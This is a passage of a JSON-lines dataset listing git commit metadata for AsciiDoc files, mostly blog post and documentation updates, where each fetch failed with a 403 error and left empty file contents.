'_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc","new_file":"_posts\/2017-09-19-adding-about-page-to-hupbressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efc99c4bc80a5edd29ff62289dae29eb63a23a1f","subject":"Update 2018-04-16-When-is-a-Blockchain-compelling.adoc","message":"Update 2018-04-16-When-is-a-Blockchain-compelling.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-16-When-is-a-Blockchain-compelling.adoc","new_file":"_posts\/2018-04-16-When-is-a-Blockchain-compelling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"398682929e102cd16d96689cbabc72a4f7bc2656","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fc51f842c9540488116cbe8e5a83176a56bc78b","subject":"Update 2015-09-24-Aspectos-importantes-del-UX.adoc","message":"Update 2015-09-24-Aspectos-importantes-del-UX.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX.adoc","new_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b76c250a9a7540dc0f1d4f87672f4d7db2e968e8","subject":"Update 2017-03-16-What-init-system-am-I-using.adoc","message":"Update 2017-03-16-What-init-system-am-I-using.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ca9ea7107ee1e0e7c4166a62aa2994cf8dd5436","subject":"Update 2017-05-04-gabe-is-starting-to-feel-it.adoc","message":"Update 2017-05-04-gabe-is-starting-to-feel-it.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-05-04-gabe-is-starting-to-feel-it.adoc","new_file":"_posts\/2017-05-04-gabe-is-starting-to-feel-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cbe06d4b07166109a4ca7dfe7f79f6e050d4e3c","subject":"0.8.0.Beta1 release announcement","message":"0.8.0.Beta1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2018-06-21-debezium-0-8-0-beta1-released.adoc","new_file":"blog\/2018-06-21-debezium-0-8-0-beta1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6c5507049757735cc88659f919a5a5d12092da6","subject":"docs: add master permanent failure recovery workflow","message":"docs: add master permanent failure recovery workflow\n\nWhile testing this I filed KUDU-1620; this wasn't an issue in\nmaster_failover-itest because it (obviously) can't do any DNS aliasing.\n\nChange-Id: I49d63efa76166bc548db75b0e43ae317c49f9e95\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4436\nReviewed-by: David Ribeiro Alves <78b9f953b197533e9b51c860b080869056433b48@apache.org>\nTested-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eefabec2525f0912ba526a5730f0bf611a0d1b72","subject":"Update 2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","message":"Update 2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6121248c4f1043d50e31dffc848d75852ff82abb","subject":"Update 2016-07-21-Contributing-to-Chronicle.adoc","message":"Update 2016-07-21-Contributing-to-Chronicle.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-07-21-Contributing-to-Chronicle.adoc","new_file":"_posts\/2016-07-21-Contributing-to-Chronicle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57e92d92cbd760909d7304a84472565a7cea2535","subject":"Update 2015-5-10-uG.adoc","message":"Update 2015-5-10-uG.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uG.adoc","new_file":"_posts\/2015-5-10-uG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ab83b2e2b0c1ec472b27450b993501951d68977","subject":"Document new GL window providers","message":"Document new GL window providers\n","repos":"qgears\/opensource-utils,qgears\/opensource-utils,qgears\/opensource-utils,qgears\/opensource-utils,qgears\/opensource-utils","old_file":"commons\/hu.qgears.opengl.commons\/README.asciidoc","new_file":"commons\/hu.qgears.opengl.commons\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qgears\/opensource-utils.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f8f13540d33a381956dd446fd6614bfb0f08bf6a","subject":"Update 2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","message":"Update 2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","new_file":"_posts\/2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f92a979ce9f61502cf2c12db7b31a25f3a2c3ba7","subject":"Update 2016-10-26-Post-3.adoc","message":"Update 2016-10-26-Post-3.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-26-Post-3.adoc","new_file":"_posts\/2016-10-26-Post-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f3edaa62ba08ea2cb91dd50a428df408d92328f","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf9cfa749cdb71b76943040ba41f88fd353e0e44","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a71f2bcf67ad0fb127b42ea2377253a2c7aa3fa6","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f6e74a156123a08c18cb7182a4362cb39bb654","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ae9d0523d7960d6e1cb4e9a484a259cfddaec0a","subject":"Add README to custom AWS sample","message":"Add README to custom AWS sample\n","repos":"olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function","old_file":"spring-cloud-function-samples\/function-sample-aws-custom\/README.adoc","new_file":"spring-cloud-function-samples\/function-sample-aws-custom\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olegz\/spring-cloud-function.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a1becb5defd142c3a23f2ebb4b5e98d72db4e4a","subject":"y2b create post ROCCAT Kone XTD Gaming Mouse Unboxing \\u0026 Overview","message":"y2b create post ROCCAT Kone XTD Gaming Mouse Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-12-ROCCAT-Kone-XTD-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-12-ROCCAT-Kone-XTD-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0573c399a7abe652e77a31cf804975abdd689f3b","subject":"y2b create post Unboxing an Xbox One in a 24 hour diner at 3AM","message":"y2b create post Unboxing an Xbox One in a 24 hour diner at 3AM","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-22-Unboxing-an-Xbox-One-in-a-24-hour-diner-at-3AM.adoc","new_file":"_posts\/2013-11-22-Unboxing-an-Xbox-One-in-a-24-hour-diner-at-3AM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d8b44d44d88f6dec27ed6b98591265d57003cd7","subject":"Update 2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","message":"Update 2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","new_file":"_posts\/2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"944ea4a5ab5710f3099a3f4fe81b5f3fca5bc152","subject":"Update 2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","message":"Update 2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","new_file":"_posts\/2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae2b98cb4613bf35a3982201910d05812470831b","subject":"Update 1993-12-12-goodgood-study.adoc","message":"Update 1993-12-12-goodgood-study.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-12-12-goodgood-study.adoc","new_file":"_posts\/1993-12-12-goodgood-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78ffc406bb5cbf73ffbee43cf0fae4c042711459","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37ae65d38ae7228e802f7d84023481f24650bf76","subject":"Update 2015-03-21-GoLang-Notes.adoc","message":"Update 2015-03-21-GoLang-Notes.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-21-GoLang-Notes.adoc","new_file":"_posts\/2015-03-21-GoLang-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90c483470c1fea42eca12c77cf0d0f376c262cbc","subject":"Update doc version","message":"Update doc version\n","repos":"elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"14832141ae43e4e1db1541f055b63fe65b77b872","subject":"Update 2016-07-29-Nodejs-C-D-N.adoc","message":"Update 2016-07-29-Nodejs-C-D-N.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-07-29-Nodejs-C-D-N.adoc","new_file":"_posts\/2016-07-29-Nodejs-C-D-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0774d88a8dd74e5264d892d7721c795f1dba4e8a","subject":"Added 01\/2019 Newsletter","message":"Added 01\/2019 Newsletter\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-03-debezium-newsletter-01-2019.adoc","new_file":"blog\/2019-06-03-debezium-newsletter-01-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75f683bdb1f59c4c8fe35261035a9193c86c6a39","subject":"Update 2018-02-23-measuring-performance-of-website.adoc","message":"Update 2018-02-23-measuring-performance-of-website.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e22047ee690dbc7ea73b4ae9bbc971edb551fa","subject":"Update 2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","message":"Update 2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_file":"_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feaec99b055517355f12ac5476509b4ca76f3215","subject":"Update 2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","message":"Update 2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","repos":"joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io","old_file":"_posts\/2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","new_file":"_posts\/2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joelcbailey\/joelcbailey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1be6bd7f4e35cd9cd67af0944b069ce267fb1755","subject":"y2b create post 3 Cool Gadgets Under $35","message":"y2b create post 3 Cool Gadgets Under $35","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-25-3-Cool-Gadgets-Under-35.adoc","new_file":"_posts\/2017-04-25-3-Cool-Gadgets-Under-35.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbe5e2ca3fe578349e4a288835492aff8fb75374","subject":"Hawkular BTM 0.1.0 release announcement","message":"Hawkular BTM 0.1.0 release announcement\n","repos":"ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0-1-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0-1-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75c5d7b32d72c826bfec1bf5fb93b5f581f4b853","subject":"Update 2015-03-15-last-one-there.adoc","message":"Update 2015-03-15-last-one-there.adoc","repos":"timofei7\/onroutenow,timofei7\/onroutenow,timofei7\/onroutenow","old_file":"_posts\/2015-03-15-last-one-there.adoc","new_file":"_posts\/2015-03-15-last-one-there.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timofei7\/onroutenow.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2150476ef85cb70160c78715207f6825032c344d","subject":"Update 2018-03-27-Test.adoc","message":"Update 2018-03-27-Test.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-03-27-Test.adoc","new_file":"_posts\/2018-03-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53d9490b169c7a3d2764e8c449783e08c4c37de2","subject":"NEW testing scenarios for authorization system tests","message":"NEW testing scenarios for authorization system tests\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design_docs\/systemtests\/authorization-tests\/scenarios.adoc","new_file":"documentation\/design_docs\/systemtests\/authorization-tests\/scenarios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2b760e53465bd5410970cf5b1e394cc7a48c27e","subject":"Update 2015-09-20-Flask-learning.adoc","message":"Update 2015-09-20-Flask-learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Flask-learning.adoc","new_file":"_posts\/2015-09-20-Flask-learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f74715a33038d0461af467a2e83bb13671ea1c3","subject":"Update 2016-02-29-multithreading.adoc","message":"Update 2016-02-29-multithreading.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-02-29-multithreading.adoc","new_file":"_posts\/2016-02-29-multithreading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e3186566f283257cb81bfc6014a84ed5df4efcb","subject":"Initial sketch of topics to discuss when making performance tuning recommendations to users.","message":"Initial sketch of topics to discuss when making performance tuning\nrecommendations to users.\n\nbk: 55a51eb0KaiejiqRoIKji_04IcmKTQ","repos":"bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper","old_file":"src\/Notes\/PERF-TUNING.adoc","new_file":"src\/Notes\/PERF-TUNING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitkeeper-scm\/bitkeeper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a50ec6090820a6577e138c566cb73a33f59b62b8","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","message":"Update 